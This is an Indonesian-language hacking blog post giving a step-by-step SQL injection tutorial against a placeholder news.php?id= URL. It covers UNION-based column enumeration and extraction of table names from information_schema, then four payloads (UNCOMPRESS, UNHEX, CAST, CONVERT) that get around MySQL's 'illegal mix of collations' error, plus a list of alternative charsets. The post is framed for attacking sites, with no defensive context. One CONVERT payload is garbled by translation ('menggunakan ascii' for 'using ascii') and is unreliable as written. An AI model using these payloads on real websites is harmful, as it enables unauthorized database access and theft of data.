Notification texts go here Contact Us Buy Now!
Beranda
SQLI

Cara Bypass Sql Injection Illegal Mix of Collations

Mustifa

 


Oke pada kesempatan kali ini gw mau share tutorial Cara Bypass Sql Injection Illegal Mix of Collations.

Yosh, mari kita mulai saja.
Target http://www.site.com/news.php?id=5 (anggap aja itu target kalian)

Seperti biasa, yang pertama cari berapa jumlah columnnya menggunakan perintah order+by+--
Contoh disini gw mendapatkan pesan error diangka 5,

http://www.site.com/news.php?id=13+order+by+5-- pesan error!
Berarti jumlah columnya ada 4.

Selanjutnya kita melakukan pertintah union+select+1,2,3-- dan seterusnya, tergantung kalian saat melakukan perintah order+by+1-- sampai mendapatkan pesan error pass diangka keberapa.

Contoh http://www.site.com/news.php?id=-13+union+select+1,2,3,4-- dan disini gw mendapatkan angka 1 dan 3.

Sekarang saatnya mencoba mendapatkan table dan untuk perintahnya seperti ini,

http://www.site.com/news.php?id=-13+union+select+1,2,concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
Dan disini gw mendapatkan pesan error seperti ini " illegal mix of collations for operation 'UNION' " kok bisa ya? gatau :v mari kita bypass.

Berikut methode yang bisa digunakan untu bypass illegal mix of collations

1. Menggunakan UNCOMPRESS 
Contoh query seperti ini http://www.site.com/news.php?id=-+union+select+1,2,uncompress(compress(concat(table_name))),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

2. Menggunakan UNHEX
Contoh query seperti ini
http://www.site.com/news.php?id=-+union+select+1,2,unhex(hex(concat(table_name))),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

3. Menggunakan CAST()
Contoh query seperti ini
http://www.site.com/news.php?id=-+union+select+1,2,cast(table_name as binary),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

4. Menggunakan CONVERT()
Contoh query seperti ini
http://www.site.com/news.php?id=-+union+select+1,2,convert(table_name menggunakan ascii),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

Dan berikut ini beberapa advance metode untuk convert()
Dalam convert() fungsi jika ascii tidak berfungsi maka kita dapat menggunakan sebagai ascii,

1. ujis
2. ucs2
3. tis620
4. swe7
5. sjis
6. macroman
7. macce
8. latin7
9. latin5
10. latin2
11. koi8u
12. koi8r
13. keybcs2
14. hp8
15. geostd8
16. gbk
17. gb2132
18. armscii8
19. ascii
20. cp1250
21. big5
22. cp1251
23. cp1256
24. cp1257
25. cp850
26. cp852
27. cp866
28. cp932
29. dec8
30. euckr
31. latin1

Nah itu dia cara bypass sql injection illegall mix of collations. Sekian dari gw semoga bermanfaat.

Thanks to Author: Rai Muzammal Hussain a.k.a RAi Je
#SQLI

Posting Komentar

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.